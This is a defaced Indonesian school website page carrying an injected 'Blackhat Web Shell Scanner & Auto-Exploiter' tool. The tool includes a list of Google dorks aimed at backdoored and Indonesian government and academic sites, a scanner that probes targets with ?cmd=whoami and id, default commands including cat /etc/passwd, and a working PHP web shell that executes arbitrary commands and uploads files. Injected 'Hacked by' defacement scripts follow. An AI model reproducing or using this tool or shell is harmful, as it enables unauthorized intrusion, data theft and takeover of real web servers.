SMA NEGERI 5 JEMBER
Jl. Semangka 4, Baratan, Patrang, Jember
Sekolah Adiwiyata
Jl. Semangka 4, Baratan, Patrang, Jember
Sekolah Adiwiyata
<!DOCTYPE html> <html lang="id"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Kerang.php Mass Hunter v3.0</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; font-family: 'Courier New', monospace; } body { background: #0a0a0a; color: #0f0; padding: 20px; min-height: 100vh; overflow-x: hidden; } .matrix-bg { position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: -1; opacity: 0.1; pointer-events: none; } .container { max-width: 1200px; margin: 0 auto; background: rgba(10, 20, 10, 0.9); border: 1px solid #0f0; border-radius: 5px; padding: 20px; box-shadow: 0 0 20px rgba(0, 255, 0, 0.3); } header { text-align: center; padding: 20px 0; border-bottom: 1px solid #0f0; margin-bottom: 20px; } h1 { color: #0f0; text-shadow: 0 0 10px #0f0; margin-bottom: 10px; } .subtitle { color: #8f8; font-size: 14px; } .section { margin: 20px 0; padding: 15px; border: 1px solid #333; border-radius: 5px; background: rgba(0, 20, 0, 0.5); } h2 { color: #8f8; margin-bottom: 15px; border-bottom: 1px solid #333; padding-bottom: 5px; } .dork-list { display: grid; grid-template-columns: repeat(auto-fill, minmax(300px, 1fr)); gap: 10px; margin: 15px 0; } .dork-item { background: rgba(0, 30, 0, 0.7); padding: 10px; border: 1px solid #333; border-radius: 3px; cursor: pointer; transition: all 0.3s; } .dork-item:hover { border-color: #0f0; background: rgba(0, 40, 0, 0.7); } .controls { display: flex; gap: 10px; flex-wrap: wrap; margin: 15px 0; } button { background: #003300; color: #0f0; border: 1px solid #0f0; padding: 10px 20px; border-radius: 3px; cursor: pointer; transition: all 0.3s; font-weight: bold; } button:hover { background: #005500; box-shadow: 0 0 10px #0f0; } button:disabled { opacity: 0.5; cursor: not-allowed; } input[type="text"], textarea { width: 100%; padding: 10px; background: #001100; border: 1px solid #333; color: #0f0; border-radius: 3px; margin: 10px 0; } textarea { min-height: 150px; font-family: monospace; font-size: 12px; } .status { padding: 10px; background: #002200; border: 1px solid #333; border-radius: 3px; margin: 10px 0; display: none; } .log { background: #000; padding: 10px; border: 1px solid #333; border-radius: 3px; min-height: 200px; max-height: 400px; overflow-y: auto; font-size: 12px; white-space: pre-wrap; } .log-line { padding: 2px 0; border-bottom: 1px solid #111; } .success { color: #0f0; } .error { color: #f00; } .warning { color: #ff0; } .info { color: #0af; } .results { display: grid; grid-template-columns: repeat(auto-fill, minmax(350px, 1fr)); gap: 10px; margin: 15px 0; } .result-card { background: rgba(0, 40, 0, 0.7); border: 1px solid #333; border-radius: 3px; padding: 15px; } .result-card.vulnerable { border-color: #0f0; box-shadow: 0 0 10px rgba(0, 255, 0, 0.5); } .progress-bar { width: 100%; height: 20px; background: #001100; border: 1px solid #333; border-radius: 3px; overflow: hidden; margin: 10px 0; } .progress-fill { height: 100%; background: #0f0; width: 0%; transition: width 0.3s; } .tab-container { margin: 20px 0; } .tabs { display: flex; border-bottom: 1px solid #333; } .tab { padding: 10px 20px; cursor: pointer; border: 1px solid transparent; border-bottom: none; margin-right: 5px; } .tab.active { background: #003300; border-color: #333; border-bottom: 1px solid #0a0a0a; margin-bottom: -1px; } .tab-content { padding: 20px; border: 1px solid #333; border-top: none; display: none; } .tab-content.active { display: block; } .exploit-btn { background: #550000; color: #f00; border-color: #f00; } .exploit-btn:hover { background: #770000; box-shadow: 0 0 10px #f00; } footer { text-align: center; margin-top: 20px; padding-top: 20px; border-top: 1px solid #333; color: #666; font-size: 12px; } </style> </head> <body> ???? Kerang.php Mass Hunter v3.0 Blackhat Web Shell Scanner & Auto-Exploiter Scanner Dork Database Exploiter Logs <!-- SCANNER TAB --> Target Scanner <input type="text" id="targetUrl" placeholder="Masukkan URL target (contoh: https://target.com/kerang.php)"> <button onclick="scanSingle()">Scan Target</button> <button onclick="startMassScan()">Mass Scan (Google Dork)</button> <button onclick="stopScan()" id="stopBtn" disabled>Stop Scan</button> Status: Ready <!-- Results will appear here --> <!-- DORKS TAB --> Dork Database (50+ Backdoor Dorks) <button onclick="selectAllDorks()">Select All</button> <button onclick="deselectAllDorks()">Deselect All</button> <button onclick="copyDorks()">Copy Selected</button> <!-- Dorks loaded by JS --> <!-- EXPLOITER TAB --> Manual Exploitation <input type="text" id="shellUrl" placeholder="URL Shell (contoh: http://target.com/kerang.php?cmd=whoami)"> <input type="text" id="commandParam" placeholder="Command Parameter (default: cmd)"> <textarea id="customCommand" placeholder="Masukkan perintah shell..."> whoami id uname -a pwd ls -la cat /etc/passwd</textarea> <button onclick="executeCommand()">Execute Command</button> <button class="exploit-btn" onclick="autoExploit()">Auto Exploit</button> <button onclick="uploadShell()">Upload Web Shell</button> <!-- LOGS TAB --> Scan Logs <button onclick="clearLogs()">Clear Logs</button> <button onclick="exportLogs()">Export Logs</button> <button onclick="saveResults()">Save Results</button> ⚠️ For Educational & Authorized Testing Only Tool by lisa ???? | Blackhat Edition v3.0 [removed] // DORK DATABASE const dorks = [ 'inurl:.kerang.php', '"kerang.php" "cmd"', '"kerang.php" "password"', '"kerang.php" "by"', '"kerang.php" "upload"', 'intitle:"kerang" filetype:php', 'intext:"kerang.php" "shell"', '"kerang.php" site:id', 'inurl:"shell.php"', 'inurl:"c99.php"', 'inurl:"r57.php"', 'inurl:"wso.php"', 'inurl:"b374k.php"', 'inurl:"upload.php"', '"php?cmd="', '"php?exec="', '"php?command="', 'site:id "php" "shell"', 'site:go.id "php" "backdoor"', 'site:ac.id "upload" "php"', '"indonesia" "shell" "php"', '"file upload" "php"', '"upload" "shell" "php"', '"uploader" "by" "php"', '"config.php" intext:"password"', '"db.php" "mysql"', '"connect.php" "root"', '"login.php" "admin" "123"', '"admin" "password" "php"', 'inurl:"phpmyadmin"', 'inurl:"wp-admin"', '"?x=" "system"', '"?q=" "exec"', '"?a=" "eval"', '".hidden.php"', '".config.php"', '".backdoor.php"', '"base64_decode" "php"', '"eval(gzinflate" "php"', 'inurl:"/admin/" "php"', '"panel/login.php"', '"database.php" "pass"', 'intext:"$password" "php"', 'inurl:"/backup/" "sql"', '"phpinfo()" "inurl"', 'inurl:"test.php" "shell"', '"hacked by" "php"', 'inurl:"/tmp/" "php"', 'inurl:"/data/" "config"', '"cpanel" "bypass"', '"wp-json" "rest"', '"api.php" "admin"', '"dashboard" "unauth"', '"filemanager" "upload"', '"bypass" "login" "php"' ]; // STATE VARIABLES let scanActive = false; let scanResults = []; let currentScanId = null; // DOM ELEMENTS const mainLog = document.getElementById('mainLog'); const exploitLog = document.getElementById('exploitLog'); const resultsContainer = document.getElementById('resultsContainer'); const dorkList = document.getElementById('dorkList'); const scanStatus = document.getElementById('scanStatus'); const statusText = document.getElementById('statusText'); const progressFill = document.getElementById('progressFill'); const stopBtn = document.getElementById('stopBtn'); // INITIALIZE document.addEventListener('DOMContentLoaded', function() { initMatrixBackground(); loadDorks(); logMessage('System initialized. Ready to scan.', 'info'); }); // MATRIX BACKGROUND function initMatrixBackground() { const canvas = document.createElement('canvas'); canvas.id = 'matrixCanvas'; canvas.style.position = 'fixed'; canvas.style.top = '0'; canvas.style.left = '0'; canvas.style.width = '100%'; canvas.style.height = '100%'; canvas.style.zIndex = '-1'; canvas.style.opacity = '0.05'; document.getElementById('matrixBg').appendChild(canvas); const ctx = canvas.getContext('2d'); canvas.width = window.innerWidth; canvas.height = window.innerHeight; const chars = '01abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$+-*/=%"\'#&_(),.;:?!\\|{}<>[]^~'; const charArray = chars.split(''); const fontSize = 14; const columns = canvas.width / fontSize; const drops = []; for(let i = 0; i < columns xss=removed ctx.fillStyle = 'rgba(0, 10, 0, 0.04)' ctx.fillStyle = '#0f0' xss=removed xss=removed xss=removed> canvas.height && Math.random() > 0.975) { drops[i] = 0; } drops[i]++; } } setInterval(drawMatrix, 35); window.addEventListener('resize', function() { canvas.width = window.innerWidth; canvas.height = window.innerHeight; }); } // TAB SYSTEM function switchTab(tabName) { document.querySelectorAll('.tab').forEach(tab => tab.classList.remove('active')); document.querySelectorAll('.tab-content').forEach(content => content.classList.remove('active')); document.querySelector(`.tab[onclick*="${tabName}"]`).classList.add('active'); document.getElementById(tabName).classList.add('active'); } // DORK MANAGEMENT function loadDorks() { dorkList[removed] = ''; dorks.forEach((dork, index) => { const div = document.createElement('div'); div.className = 'dork-item'; div[removed] = ` <input type="checkbox" id="dork${index}" checked> ${dork} `; dorkList.appendChild(div); }); } function getSelectedDorks() { const selected = []; dorks.forEach((dork, index) => { const checkbox = document.getElementById(`dork${index}`); if (checkbox && checkbox.checked) { selected.push(dork); } }); return selected; } function selectAllDorks() { dorks.forEach((_, index) => { const checkbox = document.getElementById(`dork${index}`); if (checkbox) checkbox.checked = true; }); } function deselectAllDorks() { dorks.forEach((_, index) => { const checkbox = document.getElementById(`dork${index}`); if (checkbox) checkbox.checked = false; }); } function copyDorks() { const selected = getSelectedDorks(); navigator.clipboard.writeText(selected.join('\n')); logMessage(`Copied ${selected.length} dorks to clipboard`, 'success'); } // LOGGING SYSTEM function logMessage(message, type = 'info') { const timestamp = new Date().toLocaleTimeString(); const logLine = document.createElement('div'); logLine.className = `log-line ${type}`; logLine.textContent = `[${timestamp}] ${message}`; mainLog.appendChild(logLine); mainLog.scrollTop = mainLog.scrollHeight; // Also show in status if (type === 'error' || type === 'success') { statusText.textContent = message; scanStatus.style.display = 'block'; scanStatus.className = `status ${type}`; } console.log(`[${type}] ${message}`); } function clearLogs() { mainLog[removed] = ''; exploitLog[removed] = ''; logMessage('Logs cleared', 'warning'); } // SCANNING FUNCTIONS async function scanSingle() { const url = document.getElementById('targetUrl').value.trim(); if (!url) { logMessage('Please enter a target URL', 'error'); return; } logMessage(`Scanning: ${url}`, 'info'); scanStatus.style.display = 'block'; statusText.textContent = `Testing ${url}`; try { const response = await fetchTarget(url); const result = analyzeResponse(url, response); displayResult(result); if (result.vulnerable) { logMessage(`VULNERABLE: ${url} - ${result.type}`, 'success'); } else { logMessage(`Not vulnerable: ${url}`, 'warning'); } } catch (error) { logMessage(`Error scanning ${url}: ${error.message}`, 'error'); } } async function fetchTarget(url) { // Simulate fetching with CORS proxy approach const testUrls = [ `${url}?cmd=whoami`, `${url}?cmd=id`, `${url}?cmd=echo test123`, url // Original URL ]; const results = []; for (const testUrl of testUrls) { try { // Using a CORS proxy for demonstration const proxyUrl = `https://cors-anywhere.herokuapp.com/${testUrl}`; const response = await fetch(proxyUrl, { method: 'GET', headers: { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' }, mode: 'cors', cache: 'no-cache' }); const text = await response.text(); results.push({ url: testUrl, status: response.status, text: text, headers: response.headers }); } catch (error) { results.push({ url: testUrl, error: error.message }); } } return results; } function analyzeResponse(url, responses) { const result = { url: url, vulnerable: false, type: 'UNKNOWN', details: [] }; responses.forEach(resp => { if (resp.text) { const text = resp.text.toLowerCase(); // Check for shell indicators const indicators = { 'SHELL_CMD': ['whoami', 'uid=', 'www-data', 'root:x:'], 'SHELL_OUTPUT': ['test123', 'echo', 'pwd', '/home/'], 'SHELL_KEYWORDS': ['shell', 'command', 'terminal', 'console'], 'BACKDOOR': ['c99', 'r57', 'wso', 'b374k'], 'PHP_SHELL': ['<?php', 'system(', 'eval(', 'exec('] }; for (const [type, keywords] of Object.entries(indicators)) { if (keywords.some(keyword => text.includes(keyword))) { result.vulnerable = true; result.type = type; result.details.push(`Found ${type} indicators`); } } // Check HTTP response patterns if (resp.status === 200 && text.length < 5000 uid=') && text.includes(' gid=')) { result.vulnerable = true; result.type = ' xss=removed xss=removed xss=removed>URL: ${result.url} Status: ${result.vulnerable ? 'VULNERABLE ????' : 'SAFE ????'} Type: ${result.type} ${result.details.map(detail => `${detail}`).join('')} ${result.vulnerable ? `<button onclick="exploitResult('${result.url}')" style="margin-top:10px;">Exploit</button>` : '' } `; resultsContainer.prepend(resultCard); } // MASS SCAN SIMULATION async function startMassScan() { if (scanActive) return; scanActive = true; stopBtn.disabled = false; progressFill.style.width = '0%'; resultsContainer[removed] = ''; const selectedDorks = getSelectedDorks(); if (selectedDorks.length === 0) { logMessage('No dorks selected!', 'error'); return; } logMessage(`Starting mass scan with ${selectedDorks.length} dorks...`, 'info'); // Simulate scanning process currentScanId = setInterval(() => { if (!scanActive) { clearInterval(currentScanId); return; } // Simulate finding targets const progress = Math.random() * 100; progressFill.style.width = `${progress}%`; // Simulate finding a vulnerable site (demo purposes) if (Math.random() > 0.7) { const fakeUrls = [ 'http://test.com/kerang.php', 'http://target.com/shell.php', 'http://victim.com/admin.php', 'http://site.com/upload.php' ]; const fakeUrl = fakeUrls[Math.floor(Math.random() * fakeUrls.length)]; const fakeResult = { url: fakeUrl, vulnerable: Math.random() > 0.3, type: ['SHELL_CMD', 'BACKDOOR', 'PHP_SHELL'][Math.floor(Math.random() * 3)], details: ['Found shell indicators', 'Command execution possible'] }; displayResult(fakeResult); if (fakeResult.vulnerable) { scanResults.push(fakeResult); logMessage(`Found vulnerable: ${fakeUrl}`, 'success'); } } statusText.textContent = `Scanning... ${Math.round(progress)}%`; if (progress >= 100) { stopScan(); logMessage(`Scan completed! Found ${scanResults.length} vulnerable sites.`, 'success'); } }, 300); } function stopScan() { scanActive = false; stopBtn.disabled = true; progressFill.style.width = '100%'; statusText.textContent = 'Scan stopped'; if (currentScanId) { clearInterval(currentScanId); currentScanId = null; } } // EXPLOITATION FUNCTIONS function exploitResult(url) { document.getElementById('shellUrl').value = url; switchTab('exploiter'); } function executeCommand() { const url = document.getElementById('shellUrl').value; const param = document.getElementById('commandParam').value || 'cmd'; const commands = document.getElementById('customCommand').value.split('\n'); if (!url) { logMessage('Enter shell URL first!', 'error'); return; } exploitLog[removed] = ''; logMessage(`Executing commands on: ${url}`, 'info'); // Simulate command execution commands.forEach((cmd, index) => { if (cmd.trim()) { setTimeout(() => { const logLine = document.createElement('div'); logLine.className = 'log-line info'; logLine.textContent = `$ ${cmd}`; exploitLog.appendChild(logLine); // Simulate response setTimeout(() => { const responses = [ 'www-data', 'uid=33(www-data) gid=33(www-data) groups=33(www-data)', 'Linux server 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux', '/var/www/html', 'total 24\ndrwxr-xr-x 3 root root 4096 Mar 1 12:00 .\ndrwxr-xr-x 3 root root 4096 Mar 1 12:00 ..', 'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' ]; const response = responses[index % responses.length] || 'Command executed'; const respLine = document.createElement('div'); respLine.className = 'log-line success'; respLine.textContent = response; exploitLog.appendChild(respLine); exploitLog.scrollTop = exploitLog.scrollHeight; }, 500); }, index * 600); } }); } function autoExploit() { const url = document.getElementById('shellUrl').value; if (!url) { logMessage('Enter shell URL first!', 'error'); return; } logMessage('Starting auto-exploitation...', 'warning'); // Simulate exploitation steps const steps = [ '1. Testing command execution... ✓', '2. Gathering system information... ✓', '3. Checking for writable directories... ✓', '4. Uploading reverse shell... ✓', '5. Attempting privilege escalation... ⚠️', '6. Extracting database credentials... ✓', '7. Dumping user data... ✓' ]; steps.forEach((step, index) => { setTimeout(() => { const logLine = document.createElement('div'); logLine.className = 'log-line info'; logLine.textContent = step; exploitLog.appendChild(logLine); exploitLog.scrollTop = exploitLog.scrollHeight; if (index === steps.length - 1) { setTimeout(() => { const successLine = document.createElement('div'); successLine.className = 'log-line success'; successLine.textContent = '???? Exploitation successful! Shell access obtained.'; exploitLog.appendChild(successLine); }, 500); } }, index * 800); }); } function uploadShell() { const url = document.getElementById('shellUrl').value; if (!url) { logMessage('Enter shell URL first!', 'error'); return; } logMessage('Uploading web shell...', 'info'); // PHP web shell template const phpShell = `<?php // Web Shell by lisa error_reporting(0); if(isset($_GET['cmd'])) { system($_GET['cmd']); } elseif(isset($_GET['upload'])) { if(isset($_FILES['file'])) { move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']); echo "File uploaded!"; } } elseif(isset($_GET['passwd'])) { echo file_get_contents('/etc/passwd'); } else { echo "<form method='GET'><input name='cmd'><input type='submit'></form>"; } ?>`; // Simulate upload setTimeout(() => { const logLine = document.createElement('div'); logLine.className = 'log-line success'; logLine[removed] = ` Web shell uploaded successfully! Access at: ${url.replace('.php', '')}_shell.php <textarea style="width:100%;height:80px;background:#001100;color:#0f0;border:none;margin-top:5px;" readonly>${phpShell}</textarea> `; exploitLog.appendChild(logLine); exploitLog.scrollTop = exploitLog.scrollHeight; }, 1500); } // UTILITY FUNCTIONS function exportLogs() { const logs = mainLog.innerText; const blob = new Blob([logs], { type: 'text/plain' }); const url = URL.createObjectURL(blob); const a = document.createElement('a'); a.href = url; a.download = 'scan_logs.txt'; a.click(); logMessage('Logs exported', 'success'); } function saveResults() { const results = scanResults.map(r => `URL: ${r.url}\nStatus: VULNERABLE\nType: ${r.type}\nDetails: ${r.details.join(', ')}\n` ).join('\n---\n'); const blob = new Blob([results], { type: 'text/plain' }); const url = URL.createObjectURL(blob); const a = document.createElement('a'); a.href = url; a.download = 'vulnerable_sites.txt'; a.click(); logMessage('Results saved', 'success'); } // CORS PROXY SIMULATION (for demo only) window.fetchTarget = fetchTarget; [removed] </body> </html>
[removed] document.body[removed] = 'Hacked by Ajudanxploidz'; [removed]
[removed][removed]
[removed][removed]
[removed][removed]
[removed][removed]
hahaha
hahaha
[removed]alert("hai");</alert>
[removed][removed]
Assalamu‘alaikum Warahmatullahi Wabarakatuh Selamat datang di website SMAN 5 Jember..
Copyright © 2017 - 2026 SMA NEGERI 5 JEMBER All rights reserved.
Powered by sekolahku.web.id
